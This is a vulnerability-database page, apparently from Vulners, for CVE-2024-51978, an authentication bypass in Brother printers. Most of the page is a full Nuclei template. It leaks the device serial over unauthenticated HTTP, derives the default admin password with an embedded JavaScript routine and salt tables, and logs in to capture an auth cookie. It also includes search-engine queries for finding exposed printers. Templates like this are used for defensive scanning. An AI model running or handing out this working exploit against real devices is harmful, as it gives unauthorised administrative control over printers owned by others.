| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2024-51978 | 25 Jun 202508:15 | – | attackerkb | |
| CVE-2024-51978 | 25 Jun 202507:50 | – | circl | |
| Brother Industries Multiple driver installers for Windows 安全漏洞 | 25 Jun 202500:00 | – | cnnvd | |
| CVE-2024-51978 | 25 Jun 202507:17 | – | cve | |
| CVE-2024-51978 Authentication bypass via default password generation affecting multiple models from Brother Industries, Ltd, Toshiba Tec, and Konica Minolta, Inc. | 25 Jun 202507:17 | – | cvelist | |
| EUVD-2024-54698 | 25 Jun 202507:17 | – | euvd | |
| Multiple vulnerabilities in multiple BROTHER products | 26 Jun 202509:15 | – | jvn | |
| CVE-2024-51978 | 25 Jun 202508:15 | – | nvd | |
| PT-2025-26811 | 25 Jun 202500:00 | – | ptsecurity | |
| Metasploit Wrap-Up 07/11/2025 | 14 Jul 202520:49 | – | rapid7blog |
id: CVE-2024-51978
info:
name: Brother Printers – Authentication Bypass via Default Admin Password
author: iamnoooob,pdresearch,MathematicianGoat
severity: critical
description: |
By leaking a target device's serial number, a remote attacker can generate the target device's default administrator password. The target device may leak its serial number via unauthenticated HTTP, HTTPS, IPP, SNMP, or PJL requests.
impact: |
Attackers can exploit this vulnerability to compromise system security.
remediation: |
Apply security patches to address CVE-2024-51978.
reference:
- https://www.rapid7.com/blog/post/multiple-brother-devices-multiple-vulnerabilities-fixed
- https://github.com/sfewer-r7/BrotherVulnerabilities
- https://support.brother.com/g/b/faqend.aspx?c=eu_ot&lang=en&prod=group2&faqid=faq00100846_000
- https://nvd.nist.gov/vuln/detail/CVE-2024-51978
classification:
epss-score: 0.23635
epss-percentile: 0.97524
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-51978
cwe-id: CWE-1391
metadata:
fofa-query: app="brother-Printer"
zoomeye-query: device="brother-Printer" || app="brother-Printer"
tags: cve,cve2024,brother,authenticated,default-login,vkev,vuln
# Flow: Extract serial → Generate password → Login attempt
flow: |
http(1)
javascript()
http(2)
if(template.csrf){
http(4)
} else {
http(3)
}
javascript:
- code: |
let SALT_LOOKUP_TABLE = [
0x06, 0x1A, 0x80, 0x93, 0x90, 0x60, 0xA4, 0x18, 0x76, 0xA8, 0xFA, 0x98, 0x58, 0x25, 0x5F, 0xBA,
0x24, 0xCF, 0xDD, 0xB6, 0xD0, 0xE3, 0x7A, 0x68, 0x41, 0x8B, 0x21, 0x15, 0x7E, 0x65, 0x70, 0x7F,
0x8C, 0x91, 0x3B, 0xFC, 0x13, 0x4A, 0xBE, 0xD7, 0x6C, 0x99, 0xC3, 0xD1, 0x51, 0x35, 0xDF, 0x23,
0xB0, 0x3F, 0x3D, 0x16, 0x29, 0xA1, 0x59, 0xCA, 0xA2, 0x5C, 0x43, 0x0B, 0xA5, 0x36, 0xF0, 0xFE,
0x3E, 0xED, 0xF2, 0xE6, 0xEA, 0x54, 0x66, 0x7D, 0xEE, 0x3C, 0x50, 0xEF, 0x9E, 0xD3, 0xB1, 0xF7,
0xAC, 0x5A, 0x6E, 0x12, 0x2A, 0x01, 0x46, 0x8F, 0x6B, 0x88, 0x0E, 0x52, 0xF9, 0x81, 0xA0, 0x02,
0xC1, 0xF1, 0xE9, 0xC2, 0xF6, 0x33, 0xCB, 0xB3, 0x73, 0x17, 0xFD, 0x6F, 0xF4, 0xEC, 0x84, 0xC6,
0x47, 0xCE, 0x9F, 0xD5, 0x92, 0x85, 0x53, 0x26, 0x27, 0x62, 0xEB, 0xAE, 0x3A, 0x1F, 0x0F, 0x94,
0x95, 0x82, 0x8E, 0x42, 0x28, 0xB9, 0xBF, 0xAF, 0xD4, 0x48, 0xD9, 0xC5, 0x4C, 0x64, 0x2B, 0x8D,
0xF8, 0xAA, 0xC4, 0x63, 0x87, 0xE4, 0x1D, 0xA6, 0x14, 0xCD, 0xBB, 0xC0, 0xE5, 0xDA, 0x37, 0xC9,
0xE8, 0xB8, 0x67, 0xDC, 0x5D, 0xA7, 0xAD, 0x79, 0x44, 0xF3, 0x83, 0xA9, 0x1B, 0x96, 0x89, 0xAB,
0x45, 0xBC, 0x1C, 0xB4, 0xE1, 0x20, 0x2F, 0x49, 0x22, 0x86, 0xDB, 0x4E, 0xE0, 0x9B, 0x10, 0x19,
0x97, 0x61, 0x40, 0x78, 0x5E, 0x39, 0xCC, 0x0D, 0x09, 0x9D, 0x34, 0x0C, 0x2E, 0x0A, 0x77, 0x6D,
0xDE, 0xC7, 0xD8, 0xA3, 0xE2, 0x56, 0xB5, 0x4B, 0x38, 0x74, 0x8A, 0xBD, 0x6A, 0x4F, 0x07, 0x03,
0x05, 0xFF, 0xF5, 0x31, 0x1E, 0xE7, 0xD2, 0x2D, 0x69, 0xC8, 0x5B, 0xD6, 0x57, 0x75, 0x7C, 0xB2,
0x72, 0xB7, 0x2C, 0xFB, 0x11, 0x9C, 0x7B, 0x32, 0x55, 0x30, 0x71, 0x04, 0x9A, 0x4D, 0x08, 0x100
]
let SALT_DATA_TABLE = [
'aiaFrJAn', 'FuUcjKwa', 'cMnDTitZ', 'RuSfzwJC', 'XXrLDVub', 'znimXRSU', 'dLdJgcZf', 'rgm32u2x',
'7HOLDhk\'', 'ENbuNZVy', 'eCd6Ygyf', 'gmLt2GuL', '5dhjHet3', 'nPtN7h23', '47rdTTV7', 'KAkaSzWh',
's3m7wwW2', 'wtBGnGjn', 'H3LyF$dd', 'H6EtSew2', 'D9N8iJBB', 'tPT4ZKm3', 'XEEV4tjf', 'zDXx93rw',
'HKkmbGjD', 'ng5sLECe', 'QrPVDngu', 'LPMhpZe9', 'uLzhjUwc', 'Sa9QBKW2', 'AfrPdj7y', 'ujmt9s72',
'n8Y7XrFx', '8xeRU7rW', 'RUzpQznp', '%hU5RMxP', 'ipaZKMEW', 'chP5cHCy', 'b5UJabgU', 'WtZsF7VF',
'xk8wg669', 'gAVynzbw', 'GuRgNxkm', 'UBCAUb85', 'CQgQhyfp', 'fcEegCtB', '5LSpTNPN', 'dzrQdahF',
'kD4fHLhM', 'mHQ6QAUg', 'TjZ6kiAb', '5SMdwEK6', 'RD2ytHHH', 'XgQHBfBY', '6ZZRVbHx', 'BNDUsFCC',
'iSwrrtpr', 'ucBFJbGj', 'Nzs7rhKJ', 'uHugTJX5', 'aXN3FsUF', 'uyHDwwUK', 'tbnJTYje', 'SmgfLZ2n',
'4sXy9D8j', 'YLVSee68', '3U5TbNNS', 'QjYfTBKu', 'T*8AF8dk', 'F8xQDTrW', 'Pyeda62U', '33sghDrE',
'ThiW9Naz', 'BU9TDd7k',
'72sgwM&G', 'VkV+uSUt', 'HpTdi9jL', 'G3AbGyAH', 'zbW8YCSy', 'eKB25SCe',
'rbzpCtQN', 'EZSRB966', 'nJAxxUbS', '7GZRAG9E', 'PaMCwYGQ', 'TZy2AeYr', 'jMgYEPUT', '6QAepcUc',
'jdWU9pXy', 'CeZs6T8g', 'jEEDBNPn', 'fCHg4V5W', 'rTUUjyPG', '3L5SNJhr', 'XbXK4Lg9', 'ZcdGAzLH',
'ANfMJ&6p', 'S4URfyzc', 'Pai9muCn', 'Nei%6NwR', 'BnUWBHg6', 'FwGyWrux', 'mwkuuGXX', 'WR$LK5Qu',
'Lxs4DgNM', 'KAYMHcKy', 'UnWYeeUp', '2cc3EzeX', '7nVPpdCd', 'LDPgHa9b', 'Yfwsz7zR', 'tGhb9Ych',
'Gxi4S8jC', 'QEiWU2cm', 'PFhyTxjN', 'LrpTgGLw', 'PUfziDzE', 'ACbmRneN', 'gYmjyNjF', 'RuZctKSS',
'k8KdHgDB', 'pJEA3hSG', 'X6rbghrk', '9mnbf3up', '4WU2hMHx', 'TgmNEn45', 'zRnQReEn', 'DfsPzxsX',
'UyScxhhw', 'knEsS3CX', 'xuPUKwFf', 'Ks4nKt2z', 'trBf!b67', 'rhHgt4gX', '2N8sPf#d', 'eFMjhMcB',
'aWLeRu9M', '4MiN4D63', '5nG9jMGh', 'SA5pnyQ6', 'UnSQ94nx', 'kPjzBBxy', '6CppHT3R', '3VPgRgiL',
'cP9JJDJr', 'MyMWzUMj', 'xyG4ACEd', 'dbnAbG8e', 'RnHGYc6F', 'ktCQnJWk', 'XBt5Vxr2', 'wH6iY9f9',
'atB4eri8', '8SdHujf8', 'inLRdn5s', 'Fh3N*pWc', 'Fb3XYtZz', 'GADACWcS', 'r8tsDgph', 'EumHNmFg',
'rRFKrK2x', 'TQ9nUnNk', 'P5hss6GX', 'mX8ZSQtr', 'BJMjyd7H', 'EC7r5fEm', 'TPjQpDaa', 'SZeMDpfR',
'XEDJeraW', 'YYNTgsah', '6uupfWF!', '7RcTLwHX', 'ycYr3dwT', '7VwCnTFQ', 'JGF6iigf', 'M72Kea4f',
'ZxfZWbVb', 'NcT3LGBV', 'HBU68uaa', 'UeHK4pnf', 'sDjzNHHd', 'CGjgeutc', 'PC4JbuC2', 'tNYQc7Xs',
'RGNsJQhD', 'HKEh2fba', '49x4PLUz', 'N6MLNkY5', 'NrMHeE9d', 'j5NkznV4', 'n8At3YKi', 'ZnHwAEnZ',
'3LnUmF8E', 'RBXzdUpA', 'FwGHBVej', '3wkkik7E', 'fpyGnp2u', 'ANBwfiPb', 'Ztt8X9zG', '47K7QWix',
'TzJfUdNY', 'hpD?MEAm', 'sJRh4Jni', 'TyQUgEEH', 'FBJnWWwx', '7cN3GH6e', 'hWQhzFTN', 'GamDhsgZ',
'yXM4cZKt', '9BJPKtaC', 'NVNpe4kJ', 'uSyxGxbz', 'h5zTpV3U', 'TAajcQ4h', 'VjYMEusS', 'Wpj237VG',
'yAjHYVVV', 'Hb6k7Cwe', 'yZbuDBEi', 'S4wpBmZM', 'DwFra8wk', 'j#Pk5r9W', 'PjkfS9WB', 'gHf3YGA3',
'ihDtdUCu', 'KARzJDfR', 'M7fApB5U', 'MiD44gRC', 'RdEM8y5W', '4GsGuPag', 'pETQc4k2', 'pZZu7Ras',
'AJReAUBy', 'EAMmQsWe', 'BeC2XJi8', 'PujT2eRf', '2UXLeAJu', 'hMPbY3MQ', 'QeawRP*p', 'SbCbW9Tf',
'EhNNtLyj', 'B8RjceGs', 'LaydmLeD', 'JFR7T47f', 'WCbAdTfm', 'srN9gNSE', 'gAn7h8Yp', '4PnTKVse',
'HDxGwLsN', 'tR8XUSRg', 'wLe-3Xf8', 'zH7cpxsd', 'tCc5sWFX', '3hzTj5BS',
'hLK6f&g4', 'tCzzSsm7'
]
function strToCharCodes(str) {
const arr = [];
for (let i = 0; i < str.length; ++i) arr.push(str.charCodeAt(i));
return arr;
}
function generateDefaultPassword(serial, saltLookupIndex = 254, saltData = null) {
if (!(0 <= saltLookupIndex && saltLookupIndex < SALT_LOOKUP_TABLE.length)) {
throw new Error('SaltLookupIndex must be between 0 and 255');
}
if (saltData === null && saltLookupIndex !== 0) {
const saltTableIndex = SALT_LOOKUP_TABLE[saltLookupIndex];
if (saltTableIndex >= SALT_DATA_TABLE.length) {
throw new Error('Unknown salt table data at salt table index');
}
saltData = strToCharCodes(SALT_DATA_TABLE[saltTableIndex]);
}
if (!saltData || saltData.length !== 8) {
throw new Error('SaltData must be 8 bytes');
}
// Use nuclei's Buffer implementation
const bytes = require('nuclei/bytes');
const buffer = new bytes.Buffer();
// Write the first 16 chars of serial as string
buffer.WriteString(serial.slice(0, 16));
// Prepare salt bytes in reverse order, minus 1
const saltBytes = [
saltData[7] - 1, saltData[6] - 1, saltData[5] - 1, saltData[4] - 1,
saltData[3] - 1, saltData[2] - 1, saltData[1] - 1, saltData[0] - 1
];
buffer.Write(saltBytes);
// Get the buffer as a byte array
result=buffer.Hex()
return result;
}
generateDefaultPassword(serial)
args:
serial: "{{trim_space(replace(replace(replace_regex(srno,'(BR[A-Z0-9]+)',''),']',''),'[',''))}}"
http:
- raw:
- |
GET /etc/mnt_info.csv HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- contains_all(body, 'Main Firmware Version','Model Name') && status_code == 200
internal: true
extractors:
- type: regex
part: body
name: srno
group: 1
regex:
- '"(\w{15})"'
internal: true
- raw:
- |
GET /general/status.html HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
name: logbox
group: 1
regex:
- 'id="LogBox" name="(.*?)"'
internal: true
- type: regex
part: body
name: csrf
group: 1
internal: true
regex:
- 'id="CSRFToken" name="CSRFToken" value="(.*?)"'
- raw:
- |
POST /general/status.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{logbox}}={{urlencode(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>'))}}&loginurl=/general/status.html&CSRFToken=
matchers:
- type: dsl
dsl:
- 'status_code==200 || status_code == 301'
- 'contains(set_cookie,"AuthCookie=") && !contains(location,"/etc/passerror.html")'
condition: and
extractors:
- type: dsl
name: login_password
dsl:
- replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>')
- raw:
- |
POST /general/status.html HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{logbox}}={{urlencode(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>'))}}&loginurl=/general/status.html&CSRFToken={{urlencode(csrf)}}
matchers:
- type: dsl
dsl:
- 'status_code==200 || status_code == 301'
- 'contains(set_cookie,"AuthCookie=") && !contains(location,"/etc/passerror.html")'
condition: and
extractors:
- type: dsl
name: login_password
dsl:
- replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(base64(hex_decode(sha256(hex_decode(javascript_response)))),0,8),'l','#'),'I','$'),'z','%'),'Z','&'),'b','*'),'q','-'),'O',':'),'o','?'),'v','@'),'y','>')
# digest: 4a0a00473045022100d3c3482b424c1a13e2345b021bf34b1fb7d531bd1f7a39cdc810f00a6cf35e27022051e1850d639961a607e1fc2f8bb1b23ab47f53c81c8b36aa6bc4bf106bfaf995:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation